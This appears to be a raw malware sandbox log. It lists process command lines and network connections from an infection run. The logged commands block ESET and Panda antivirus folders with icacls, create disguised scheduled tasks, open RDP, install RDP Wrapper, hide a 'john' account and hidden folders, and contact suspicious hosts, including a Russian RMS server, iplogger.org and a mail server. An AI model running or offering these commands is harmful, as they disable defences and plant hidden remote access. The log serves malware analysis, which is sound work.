C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\ESET" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Panda Security" /deny %username%:(OI)(CI)(F)
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Program Files (x86)\Panda Security" /deny Admin:(OI)(CI)(F)
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\SystemC" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\Temp.bat
C:\Windows\SysWOW64\timeout.exe
TIMEOUT /T 5 /NOBREAK
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ipconfig /flushdns
C:\Windows\system32\ipconfig.exe
ipconfig /flushdns
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c gpupdate /force
C:\Windows\system32\gpupdate.exe
gpupdate /force
C:\Windows\SYSTEM32\netsh.exe
netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
C:\rdp\RDPWInst.exe
"RDPWInst.exe" -w
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "john" /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\net.exe
net accounts /maxpwage:unlimited
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 accounts /maxpwage:unlimited
C:\Windows\SysWOW64\attrib.exe
attrib +s +h "C:\Program Files\RDP Wrapper\*.*"
C:\Windows\SysWOW64\attrib.exe
attrib +s +h "C:\Program Files\RDP Wrapper"
C:\Windows\SysWOW64\attrib.exe
attrib +s +h "C:\rdp"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=56 --always-read-main-dll --field-trial-handle=5184,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=7112 /prefetch:1
C:\Windows\SysWOW64\timeout.exe
TIMEOUT /T 3 /NOBREAK
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=57 --always-read-main-dll --field-trial-handle=7996,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=6940 /prefetch:1
C:\Windows\SysWOW64\taskkill.exe
TASKKILL /IM 1.exe /T /F
C:\Windows\SysWOW64\taskkill.exe
TASKKILL /IM P.exe /T /F
C:\Windows\SysWOW64\attrib.exe
ATTRIB +H +S C:\Programdata\Windows
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=58 --always-read-main-dll --field-trial-handle=1220,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=6352 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=59 --always-read-main-dll --field-trial-handle=5488,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=6080 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=60 --always-read-main-dll --field-trial-handle=3484,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=7008 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=61 --always-read-main-dll --field-trial-handle=5240,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=7196 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=62 --always-read-main-dll --field-trial-handle=7176,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=5396 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=63 --always-read-main-dll --field-trial-handle=7024,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=7984 /prefetch:1
C:\Programdata\RealtekHD\taskhostw.exe
C:\Programdata\RealtekHD\taskhostw.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=64 --always-read-main-dll --field-trial-handle=8256,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=5524 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=8232,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=8200 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=66 --always-read-main-dll --field-trial-handle=8200,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=8924 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=67 --always-read-main-dll --field-trial-handle=6524,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=8312 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=68 --always-read-main-dll --field-trial-handle=9164,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=7096 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=69 --always-read-main-dll --field-trial-handle=8148,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=9108 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=70 --always-read-main-dll --field-trial-handle=7444,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=7948 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=71 --always-read-main-dll --field-trial-handle=6156,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=5396 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=72 --always-read-main-dll --field-trial-handle=6100,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=8236 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=73 --always-read-main-dll --field-trial-handle=1972,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=8892 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=8536,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=8532 /prefetch:8
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\Temp1_mobsync.zip\mobsync.dll
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=9192,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=6012 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=8828,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=9012 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=8828,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=9012 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=77 --always-read-main-dll --field-trial-handle=7976,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=8936 /prefetch:1
C:\Programdata\RealtekHD\taskhostw.exe
C:\Programdata\RealtekHD\taskhostw.exe
C:\Users\Admin\Downloads\Mabezat.exe
"C:\Users\Admin\Downloads\Mabezat.exe"
C:\Users\Admin\Downloads\Mabezat.exe
"C:\Users\Admin\Downloads\Mabezat.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=8864,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=8116 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=79 --always-read-main-dll --field-trial-handle=8572,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=8808 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=80 --always-read-main-dll --field-trial-handle=8616,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=8884 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7140,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=8288 /prefetch:8
C:\Programdata\RealtekHD\taskhostw.exe
C:\Programdata\RealtekHD\taskhostw.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7984,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=8360 /prefetch:8
C:\Programdata\RealtekHD\taskhostw.exe
C:\Programdata\RealtekHD\taskhostw.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| GB | 142.250.178.14:443 | clients2.google.com | tcp |
| US | 150.171.28.11:443 | edge.microsoft.com | tcp |
| US | 150.171.28.11:80 | edge.microsoft.com | tcp |
| US | 150.171.28.11:443 | edge.microsoft.com | tcp |
| US | 8.8.8.8:53 | copilot.microsoft.com | udp |
| US | 8.8.8.8:53 | copilot.microsoft.com | udp |
| US | 8.8.8.8:53 | clients2.googleusercontent.com | udp |
| US | 8.8.8.8:53 | clients2.googleusercontent.com | udp |
| GB | 2.18.27.92:443 | copilot.microsoft.com | tcp |
| GB | 142.250.187.225:443 | clients2.googleusercontent.com | tcp |
| GB | 142.250.187.225:443 | clients2.googleusercontent.com | tcp |
| US | 8.8.8.8:53 | msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com | udp |
| US | 8.8.8.8:53 | msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com | udp |
| IT | 184.51.127.32:443 | msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com | tcp |
| GB | 2.18.27.82:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 150.171.28.11:443 | edge.microsoft.com | tcp |
| US | 150.171.27.11:443 | edge.microsoft.com | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 150.171.28.11:443 | edge.microsoft.com | tcp |
| US | 150.171.27.11:443 | edge.microsoft.com | tcp |
| US | 150.171.28.11:443 | edge.microsoft.com | tcp |
| US | 150.171.27.11:443 | edge.microsoft.com | tcp |
| GB | 2.18.27.82:443 | www.bing.com | udp |
| IE | 23.216.155.137:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | ntp.msn.com | udp |
| US | 8.8.8.8:53 | ntp.msn.com | udp |
| US | 204.79.197.203:443 | ntp.msn.com | tcp |
| US | 204.79.197.203:443 | ntp.msn.com | tcp |
| US | 8.8.8.8:53 | assets.msn.com | udp |
| US | 8.8.8.8:53 | assets.msn.com | udp |
| IT | 184.51.127.32:443 | assets.msn.com | tcp |
| IT | 184.51.127.32:443 | assets.msn.com | tcp |
| IT | 184.51.127.32:443 | assets.msn.com | udp |
| US | 8.8.8.8:53 | img-s-msn-com.akamaized.net | udp |
| US | 8.8.8.8:53 | img-s-msn-com.akamaized.net | udp |
| US | 8.8.8.8:53 | sb.scorecardresearch.com | udp |
| US | 8.8.8.8:53 | sb.scorecardresearch.com | udp |
| US | 8.8.8.8:53 | th.bing.com | udp |
| US | 8.8.8.8:53 | th.bing.com | udp |
| US | 8.8.8.8:53 | c.msn.com | udp |
| US | 8.8.8.8:53 | c.msn.com | udp |
| US | 8.8.8.8:53 | c.bing.com | udp |
| US | 8.8.8.8:53 | c.bing.com | udp |
| IE | 23.216.155.169:443 | www.bing.com | tcp |
| IT | 184.51.127.32:443 | assets.msn.com | udp |
| US | 150.171.28.10:443 | c.bing.com | tcp |
| IE | 13.74.129.1:443 | c.msn.com | tcp |
| GB | 2.18.27.76:443 | th.bing.com | tcp |
| FR | 13.249.9.46:443 | sb.scorecardresearch.com | tcp |
| IT | 88.221.111.90:443 | img-s-msn-com.akamaized.net | tcp |
| US | 8.8.8.8:53 | browser.events.data.msn.com | udp |
| US | 8.8.8.8:53 | browser.events.data.msn.com | udp |
| IT | 88.221.111.90:443 | img-s-msn-com.akamaized.net | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 150.171.27.11:443 | edge.microsoft.com | tcp |
| US | 8.8.8.8:53 | srtb.msn.com | udp |
| US | 8.8.8.8:53 | srtb.msn.com | udp |
| US | 204.79.197.203:443 | srtb.msn.com | tcp |
| US | 204.79.197.203:443 | srtb.msn.com | tcp |
| IE | 23.216.155.169:443 | www.bing.com | udp |
| GB | 2.18.27.76:443 | th.bing.com | udp |
| US | 8.8.8.8:53 | r.bing.com | udp |
| US | 8.8.8.8:53 | r.bing.com | udp |
| US | 8.8.8.8:53 | th.bing.com | udp |
| US | 8.8.8.8:53 | th.bing.com | udp |
| GB | 2.18.27.76:443 | th.bing.com | tcp |
| GB | 2.18.27.76:443 | th.bing.com | tcp |
| GB | 2.18.27.76:443 | th.bing.com | tcp |
| GB | 2.18.27.76:443 | th.bing.com | tcp |
| GB | 2.18.27.76:443 | th.bing.com | udp |
| US | 8.8.8.8:53 | login.microsoftonline.com | udp |
| US | 8.8.8.8:53 | login.microsoftonline.com | udp |
| NL | 40.126.32.74:443 | login.microsoftonline.com | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | github.githubassets.com | udp |
| US | 8.8.8.8:53 | github.githubassets.com | udp |
| US | 8.8.8.8:53 | avatars.githubusercontent.com | udp |
| US | 8.8.8.8:53 | avatars.githubusercontent.com | udp |
| US | 185.199.110.154:443 | github.githubassets.com | tcp |
| US | 185.199.110.154:443 | github.githubassets.com | tcp |
| US | 185.199.110.154:443 | github.githubassets.com | tcp |
| US | 185.199.110.154:443 | github.githubassets.com | tcp |
| US | 185.199.110.154:443 | github.githubassets.com | tcp |
| US | 185.199.110.154:443 | github.githubassets.com | tcp |
| US | 8.8.8.8:53 | user-images.githubusercontent.com | udp |
| US | 8.8.8.8:53 | user-images.githubusercontent.com | udp |
| US | 8.8.8.8:53 | github-cloud.s3.amazonaws.com | udp |
| US | 8.8.8.8:53 | github-cloud.s3.amazonaws.com | udp |
| US | 185.199.110.133:443 | user-images.githubusercontent.com | tcp |
| US | 185.199.110.133:443 | user-images.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 150.171.28.11:443 | edge.microsoft.com | tcp |
| US | 8.8.8.8:53 | collector.github.com | udp |
| US | 8.8.8.8:53 | collector.github.com | udp |
| US | 140.82.114.21:443 | collector.github.com | tcp |
| US | 185.199.110.154:443 | github.githubassets.com | tcp |
| US | 8.8.8.8:53 | api.github.com | udp |
| US | 8.8.8.8:53 | api.github.com | udp |
| US | 140.82.114.21:443 | collector.github.com | tcp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| US | 8.8.8.8:53 | edge-consumer-static.azureedge.net | udp |
| US | 8.8.8.8:53 | edge-consumer-static.azureedge.net | udp |
| US | 13.107.246.64:443 | edge-consumer-static.azureedge.net | tcp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| GB | 2.18.27.76:443 | th.bing.com | udp |
| IE | 23.216.155.169:443 | www.bing.com | udp |
| IT | 88.221.111.90:443 | img-s-msn-com.akamaized.net | udp |
| US | 149.255.35.125:443 | tcp | |
| FR | 51.178.195.151:443 | tcp | |
| US | 8.8.8.8:53 | static.edge.microsoftapp.net | udp |
| US | 8.8.8.8:53 | static.edge.microsoftapp.net | udp |
| US | 13.107.246.64:443 | static.edge.microsoftapp.net | tcp |
| US | 8.8.8.8:53 | edge-mobile-static.azureedge.net | udp |
| US | 8.8.8.8:53 | edge-mobile-static.azureedge.net | udp |
| US | 8.8.8.8:53 | edge-cloud-resource-static.azureedge.net | udp |
| US | 8.8.8.8:53 | edge-cloud-resource-static.azureedge.net | udp |
| US | 13.107.246.64:443 | edge-cloud-resource-static.azureedge.net | tcp |
| US | 13.107.246.64:443 | edge-cloud-resource-static.azureedge.net | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 216.58.201.99:80 | c.pki.goog | tcp |
| GB | 2.18.27.82:443 | www.bing.com | udp |
| US | 8.8.8.8:53 | msedge.b.tlu.dl.delivery.mp.microsoft.com | udp |
| US | 2.16.55.12:80 | msedge.b.tlu.dl.delivery.mp.microsoft.com | tcp |
| FR | 51.178.195.151:443 | tcp | |
| FR | 51.77.7.204:443 | tcp | |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | deff.nelreports.net | udp |
| US | 8.8.8.8:53 | deff.nelreports.net | udp |
| IT | 184.51.127.41:443 | deff.nelreports.net | tcp |
| US | 8.8.8.8:53 | browser.events.data.msn.com | udp |
| US | 8.8.8.8:53 | browser.events.data.msn.com | udp |
| US | 8.8.8.8:53 | msedge.b.tlu.dl.delivery.mp.microsoft.com | udp |
| FR | 51.77.7.204:443 | tcp | |
| FR | 51.77.7.204:443 | tcp | |
| US | 8.8.8.8:53 | msedge.b.tlu.dl.delivery.mp.microsoft.com | udp |
| FR | 51.77.7.204:443 | tcp | |
| FR | 51.77.7.204:443 | tcp | |
| IE | 2.19.176.96:443 | www.bing.com | udp |
| US | 8.8.8.8:53 | msedge.b.tlu.dl.delivery.mp.microsoft.com | udp |
| FR | 51.77.7.204:443 | tcp | |
| CA | 51.222.39.81:443 | tcp | |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| FR | 51.77.7.204:443 | tcp | |
| CA | 51.222.39.81:443 | tcp | |
| US | 149.255.35.125:443 | tcp | |
| US | 38.68.50.179:443 | tcp | |
| US | 8.8.8.8:53 | collector.github.com | udp |
| US | 8.8.8.8:53 | collector.github.com | udp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | boglogov.site | udp |
| US | 8.8.8.8:53 | boglogov.site | udp |
| US | 8.8.8.8:53 | rms-server.tektonit.ru | udp |
| RU | 77.223.119.187:5655 | rms-server.tektonit.ru | tcp |
| US | 38.68.50.179:443 | tcp | |
| FR | 51.77.7.204:443 | tcp | |
| US | 8.8.8.8:53 | api.github.com | udp |
| US | 8.8.8.8:53 | api.github.com | udp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 150.171.27.11:443 | edge.microsoft.com | tcp |
| US | 8.8.8.8:53 | edgeassetservice.azureedge.net | udp |
| US | 8.8.8.8:53 | edgeassetservice.azureedge.net | udp |
| US | 13.107.246.64:443 | edgeassetservice.azureedge.net | tcp |
| GB | 2.18.27.82:443 | www.bing.com | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | freemail.freehost.com.ua | udp |
| UA | 194.0.200.251:465 | freemail.freehost.com.ua | tcp |
| US | 8.8.8.8:53 | msedge.b.tlu.dl.delivery.mp.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| FR | 51.77.7.204:443 | tcp | |
| FR | 51.77.7.204:443 | tcp | |
| IE | 23.216.155.155:443 | www.bing.com | udp |
| IE | 23.216.155.155:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | taskhostw.com | udp |
| RU | 152.89.218.85:80 | taskhostw.com | tcp |
| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 216.58.201.99:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | taskhostw.com | udp |
| RU | 152.89.218.85:80 | taskhostw.com | tcp |
| US | 8.8.8.8:53 | api.github.com | udp |
| US | 8.8.8.8:53 | api.github.com | udp |
